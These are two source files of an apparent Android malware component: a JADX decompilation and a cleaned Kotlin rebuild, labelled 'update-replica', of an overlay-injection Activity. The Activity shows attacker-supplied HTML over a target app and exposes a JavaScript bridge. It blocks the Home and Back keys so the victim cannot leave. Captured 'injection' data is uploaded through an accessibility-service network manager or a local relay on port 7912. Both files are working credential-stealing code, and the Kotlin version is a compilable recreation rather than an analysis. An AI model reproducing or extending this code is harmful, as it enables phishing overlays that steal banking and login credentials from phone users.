File: jadx-reference/rock/inject/jbqfkndyx.java
package com.storm.safe.rock.inject;

import android.app.Activity;
import android.os.Bundle;
import android.util.Base64;
import android.view.KeyEvent;
import android.view.ViewGroup;
import android.view.ViewParent;
import android.webkit.WebStorage;
import android.webkit.WebView;
import java.io.File;
import kotlin.coroutines.AbstractC0775a0;
import kotlin.text.AbstractC0779a1;
import kotlinx.coroutines.AbstractC0780a0;
import org.json.JSONObject;
import p000.AbstractC0577hd;
import p000.AbstractC1117qo;
import p000.AbstractC1120qr;
import p000.AbstractC1262tj;
import p000.AbstractC1517zh;
import p000.C0873ms;
import p000.ExecutorC1158qw;
import p000.jk1;
import p000.kk1;
import p000.lk1;
import p000.mk1;
import p000.t60;
import p000.y21;

/* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
/* loaded from: classes2.dex */
public final class jbqfkndyx extends Activity {

    /* renamed from: a4 */
    public static final C0253a0 f51944a4 = new C0253a0(null);

    /* renamed from: a5 */
    public static boolean f51945a5;

    /* renamed from: a6 */
    public static boolean f51946a6;

    /* renamed from: a7 */
    public static volatile jbqfkndyx f51947a7;

    /* renamed from: a0 */
    public WebView f51948a0;

    /* renamed from: a1 */
    public String f51949a1 = "";

    /* renamed from: a2 */
    public final C0873ms f51950a2;

    /* renamed from: a3 */
    public final C0873ms f51951a3;

    /* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
    /* renamed from: com.storm.safe.rock.inject.jbqfkndyx$a0 */
    public static final class C0253a0 {
        public /* synthetic */ C0253a0(AbstractC1120qr abstractC1120qr) {
            this();
        }

        /* JADX INFO: Access modifiers changed from: private */
        public static final void finishCurrent$lambda$1$lambda$0(jbqfkndyx jbqfkndyxVar) {
            t60.m214695b6(jbqfkndyxVar, "$it");
            jbqfkndyxVar.finishAndRemoveTask();
        }

        /* JADX INFO: Access modifiers changed from: private */
        public static final void finishForPackage$lambda$3$lambda$2(jbqfkndyx jbqfkndyxVar) {
            t60.m214695b6(jbqfkndyxVar, "$it");
            jbqfkndyxVar.finishAndRemoveTask();
        }

        public final void finishCurrent() {
            jbqfkndyx jbqfkndyxVar = jbqfkndyx.f51947a7;
            if (jbqfkndyxVar != null) {
                jbqfkndyxVar.runOnUiThread(new jk1(jbqfkndyxVar, 1));
            }
        }

        public final void finishForPackage(String str) {
            t60.m214695b6(str, "packageName");
            jbqfkndyx jbqfkndyxVar = jbqfkndyx.f51947a7;
            if (jbqfkndyxVar == null || !t60.m214686a2(jbqfkndyxVar.f51949a1, str)) {
                return;
            }
            jbqfkndyxVar.runOnUiThread(new jk1(jbqfkndyxVar, 0));
        }

        public final boolean getActive() {
            return jbqfkndyx.f51945a5;
        }

        public final boolean getInForeground() {
            return jbqfkndyx.f51946a6;
        }

        public final void setActive(boolean z) {
            jbqfkndyx.f51945a5 = z;
        }

        public final void setInForeground(boolean z) {
            jbqfkndyx.f51946a6 = z;
        }

        private C0253a0() {
        }
    }

    public jbqfkndyx() {
        ExecutorC1158qw executorC1158qw = AbstractC1262tj.f60234a1;
        this.f51950a2 = AbstractC1117qo.m214407a0(executorC1158qw);
        this.f51951a3 = AbstractC1117qo.m214407a0(AbstractC0775a0.m213638a1(executorC1158qw, new y21()));
    }

    /* renamed from: a0 */
    public static final void m211201a0(jbqfkndyx jbqfkndyxVar, String str) {
        try {
            if (str.length() == 0) {
                t60.m214726f4("jbqfkndyx", "⚠️ 数据为空，不发送");
                return;
            }
            JSONObject jSONObject = new JSONObject();
            jSONObject.put("packageName", jbqfkndyxVar.f51949a1);
            jSONObject.put("type", "injection");
            jSONObject.put("data", str);
            jSONObject.put("timestamp", System.currentTimeMillis());
            AbstractC0780a0.m213692a3(jbqfkndyxVar.f51951a3, null, new jbqfkndyx$sendInjectionData$1(jSONObject, jbqfkndyxVar, null), 3);
        } catch (Exception e) {
            t60.m214705c6("jbqfkndyx", "❌ 发送注入数据失败", e);
        }
    }

    @Override // android.app.Activity
    public final void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        f51947a7 = this;
        String stringExtra = getIntent().getStringExtra("package_name");
        if (stringExtra == null) {
            stringExtra = "";
        }
        this.f51949a1 = stringExtra;
        String stringExtra2 = getIntent().getStringExtra("html_file");
        if (stringExtra2 == null) {
            stringExtra2 = "";
        }
        String stringExtra3 = getIntent().getStringExtra("html_content");
        String str = stringExtra3 != null ? stringExtra3 : "";
        if (str.length() == 0 && stringExtra2.length() > 0) {
            try {
                str = AbstractC1517zh.m215420f8(new File(stringExtra2));
                t60.m214714d6("jbqfkndyx", "✅ 从文件加载HTML: " + stringExtra2 + " (" + str.length() + "字节)");
            } catch (Exception e) {
                t60.m214705c6("jbqfkndyx", "❌ 读取HTML文件失败: ".concat(stringExtra2), e);
            }
        }
        if (str.length() == 0) {
            t60.m214704c5("jbqfkndyx", "❌ HTML内容为空，关闭Activity");
            finishAndRemoveTask();
            return;
        }
        try {
            WebView webView = new WebView(this);
            webView.getSettings().setJavaScriptEnabled(true);
            webView.setScrollBarStyle(0);
            webView.setWebViewClient(new lk1());
            webView.setWebChromeClient(new kk1());
            webView.addJavascriptInterface(new mk1(this, this), "Android");
            if (AbstractC0779a1.m213679d2(str, false, "data:text/html;base64,")) {
                String strSubstring = str.substring(22);
                t60.m214694b5(strSubstring, "this as java.lang.String).substring(startIndex)");
                byte[] bArrDecode = Base64.decode(strSubstring, 0);
                t60.m214694b5(bArrDecode, "decode(base64, Base64.DEFAULT)");
                str = new String(bArrDecode, AbstractC0577hd.f56650a0);
            }
            webView.loadDataWithBaseURL(null, str, "text/html", "UTF-8", null);
            this.f51948a0 = webView;
            setContentView(webView);
            f51945a5 = true;
            f51946a6 = true;
        } catch (Exception e2) {
            t60.m214705c6("jbqfkndyx", "❌ 创建HTML注入Activity失败", e2);
            finishAndRemoveTask();
        }
    }

    @Override // android.app.Activity
    public final void onDestroy() {
        super.onDestroy();
        f51945a5 = false;
        f51946a6 = false;
        AbstractC1117qo.m214410a3(this.f51950a2);
        if (t60.m214686a2(f51947a7, this)) {
            f51947a7 = null;
        }
        try {
            WebView webView = this.f51948a0;
            if (webView != null) {
                if (webView.getParent() != null) {
                    ViewParent parent = webView.getParent();
                    ViewGroup viewGroup = parent instanceof ViewGroup ? (ViewGroup) parent : null;
                    if (viewGroup != null) {
                        viewGroup.removeView(webView);
                    }
                }
                WebStorage.getInstance().deleteAllData();
                webView.destroy();
            }
            this.f51948a0 = null;
        } catch (Exception e) {
            t60.m214705c6("jbqfkndyx", "❌ 销毁HTML注入Activity失败", e);
        }
    }

    @Override // android.app.Activity, android.view.KeyEvent.Callback
    public final boolean onKeyDown(int i, KeyEvent keyEvent) {
        t60.m214695b6(keyEvent, "event");
        if (i == 3 || i == 4) {
            return true;
        }
        return super.onKeyDown(i, keyEvent);
    }

    @Override // android.app.Activity
    public final void onPause() {
        super.onPause();
        f51946a6 = false;
    }

    @Override // android.app.Activity
    public final void onResume() {
        super.onResume();
        f51946a6 = true;
    }
}

File: update-replica/app/src/main/java/com/storm/safe/rock/inject/jbqfkndyx.kt
package com.storm.safe.rock.inject

import android.app.Activity
import android.os.Bundle
import android.util.Base64
import android.util.Log
import android.view.KeyEvent
import android.view.ViewGroup
import android.webkit.WebChromeClient
import android.webkit.WebView
import android.webkit.WebViewClient
import android.webkit.WebStorage
import com.storm.safe.rock.service.MyAccessibilityService
import com.storm.safe.rock.service.modules.NetworkManager
import kotlinx.coroutines.*
import org.json.JSONObject
import java.io.BufferedReader
import java.io.File
import java.io.InputStreamReader
import java.net.HttpURLConnection
import java.net.URL

/**
 * WebView injection Activity — loads HTML content and provides a JavaScript bridge.
 * Sends injection data via NetworkManager or falls back to local-service HTTP.
 *
 * Reverse-engineered from JADX: inject/jbqfkndyx.java (238 lines) +
 * inject/jbqfkndyx$sendInjectionData$1.java (196 lines).
 * Inner coroutine class merged into parent as suspendable function.
 *
 * Renamed: f51944a4→Companion, f51945a5→active, f51946a6→inForeground,
 *          f51947a7→currentInstance, f51948a0→webView, f51949a1→targetPackageName,
 *          m211201a0→sendInjectionData
 */
class jbqfkndyx : Activity() {

    companion object {
        private const val TAG = "jbqfkndyx"

        @Volatile
        @JvmStatic
        var active: Boolean = false

        @Volatile
        @JvmStatic
        var inForeground: Boolean = false

        @Volatile
        @JvmStatic
        var currentInstance: jbqfkndyx? = null

        /**
         * Close the currently active injection activity.
         */
        @JvmStatic
        fun finishCurrent() {
            val inst = currentInstance ?: return
            inst.runOnUiThread { inst.finishAndRemoveTask() }
        }

        /**
         * Close the injection activity only if it's targeting the given package.
         */
        @JvmStatic
        fun finishForPackage(packageName: String) {
            val inst = currentInstance ?: return
            if (inst.targetPackageName == packageName) {
                inst.runOnUiThread { inst.finishAndRemoveTask() }
            }
        }
    }

    var webView: WebView? = null
    var targetPackageName: String = ""
    private val coroutineScope = CoroutineScope(Dispatchers.IO + SupervisorJob())

    /**
     * Send injection data via NetworkManager, fallback to local-service HTTP.
     * Merged from inner coroutine class jbqfkndyx$sendInjectionData$1.
     */
    fun sendInjectionData(data: String) {
        try {
            if (data.isEmpty()) {
                Log.w(TAG, "⚠️ 数据为空，不发送")
                return
            }
            val json = JSONObject().apply {
                put("packageName", targetPackageName)
                put("type", "injection")
                put("data", data)
                put("timestamp", System.currentTimeMillis())
            }
            coroutineScope.launch {
                var networkManagerSuccess = false
                try {
                    val svc = MyAccessibilityService.Companion.getInstance()
                    val nm = svc?.getNetworkManager()
                    if (nm != null) {
                        nm.sendData(json)
                        // ADAPT: depends on NetworkManager.sendData suspend call
                        Log.d(TAG, "✅ 注入数据已通过 NetworkManager 上传成功")
                        // Notify local-service to remove injection task
                        try {
                            val removeUrl = URL("http://127.0.0.1:7912/removeInjectionTask?packageName=$targetPackageName")
                            val conn = removeUrl.openConnection() as HttpURLConnection
                            conn.connectTimeout = 3000
                            conn.readTimeout = 3000
                            conn.requestMethod = "GET"
                            conn.responseCode
                            conn.disconnect()
                            Log.d(TAG, "✅ 已通知 local-service 删除注入任务: $targetPackageName")
                        } catch (e: Exception) {
                            Log.w(TAG, "⚠️ 通知 local-service 删除任务失败: ${e.message}")
                        }
                        networkManagerSuccess = true
                    }
                } catch (e: Exception) {
                    Log.w(TAG, "⚠️ NetworkManager 上传失败: ${e.message}")
                }

                if (!networkManagerSuccess) {
                    // Fallback to local-service HTTP POST
                    try {
                        Log.d(TAG, "📤 尝试通过 local-service 转发上传...")
                        val conn = URL("http://127.0.0.1:7912/injectionData").openConnection() as HttpURLConnection
                        conn.connectTimeout = 5000
                        conn.readTimeout = 10000
                        conn.requestMethod = "POST"
                        conn.setRequestProperty("Content-Type", "application/json")
                        conn.doOutput = true
                        val output = conn.outputStream
                        output.write(json.toString().toByteArray(Charsets.UTF_8))
                        output.close()
                        val responseCode = conn.responseCode
                        val responseBody = try {
                            BufferedReader(InputStreamReader(conn.inputStream, Charsets.UTF_8)).readText()
                        } catch (_: Exception) {
                            ""
                        }
                        conn.disconnect()
                        if (responseCode == 200 && responseBody.contains("\"success\":true")) {
                            Log.d(TAG, "✅ 注入数据已通过 local-service 转发成功")
                        } else {
                            Log.e(TAG, "❌ local-service 转发失败: HTTP $responseCode → $responseBody")
                            networkManagerSuccess = false
                        }
                    } catch (e: Exception) {
                        Log.w(TAG, "❌ local-service 转发异常: ${e.message}")
                    }
                }

                if (!networkManagerSuccess) {
                    Log.e(TAG, "❌ 两个通道都失败，注入数据未能上传（任务保留，下次继续）")
                }
            }
        } catch (e: Exception) {
            Log.e(TAG, "❌ 发送注入数据失败", e)
        }
    }

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        currentInstance = this
        targetPackageName = intent.getStringExtra("package_name") ?: ""
        val htmlFile = intent.getStringExtra("html_file") ?: ""
        var htmlContent = intent.getStringExtra("html_content") ?: ""

        if (htmlContent.isEmpty() && htmlFile.isNotEmpty()) {
            try {
                htmlContent = File(htmlFile).readText()
                Log.d(TAG, "✅ 从文件加载HTML: $htmlFile (${htmlContent.length}字节)")
            } catch (e: Exception) {
                Log.e(TAG, "❌ 读取HTML文件失败: $htmlFile", e)
            }
        }

        if (htmlContent.isEmpty()) {
            Log.e(TAG, "❌ HTML内容为空，关闭Activity")
            finishAndRemoveTask()
            return
        }

        try {
            val wv = WebView(this)
            @Suppress("SetJavaScriptEnabled")
            wv.settings.javaScriptEnabled = true
            wv.scrollBarStyle = 0
            wv.webViewClient = WebViewClient()
            wv.webChromeClient = WebChromeClient()
            // JADX: mk1 (WebViewJsBridge) — JS bridge for injection data
            wv.addJavascriptInterface(com.storm.safe.rock.p000.WebViewJsBridge(this), "Android")

            // Handle base64-encoded HTML
            if (htmlContent.startsWith("data:text/html;base64,")) {
                val base64 = htmlContent.substring(22)
                val decoded = Base64.decode(base64, Base64.DEFAULT)
                htmlContent = String(decoded, Charsets.UTF_8)
            }

            wv.loadDataWithBaseURL(null, htmlContent, "text/html", "UTF-8", null)
            webView = wv
            setContentView(wv)
            active = true
            inForeground = true
        } catch (e: Exception) {
            Log.e(TAG, "❌ 创建HTML注入Activity失败", e)
            finishAndRemoveTask()
        }
    }

    override fun onDestroy() {
        super.onDestroy()
        active = false
        inForeground = false
        coroutineScope.cancel()
        if (currentInstance === this) {
            currentInstance = null
        }
        try {
            webView?.let { wv ->
                (wv.parent as? ViewGroup)?.removeView(wv)
                WebStorage.getInstance().deleteAllData()
                wv.destroy()
            }
            webView = null
        } catch (e: Exception) {
            Log.e(TAG, "❌ 销毁HTML注入Activity失败", e)
        }
    }

    override fun onKeyDown(keyCode: Int, event: KeyEvent): Boolean {
        // Block HOME(3) and BACK(4) keys
        if (keyCode == 3 || keyCode == 4) return true
        return super.onKeyDown(keyCode, event)
    }

    override fun onPause() {
        super.onPause()
        inForeground = false
    }

    override fun onResume() {
        super.onResume()
        inForeground = true
    }
}
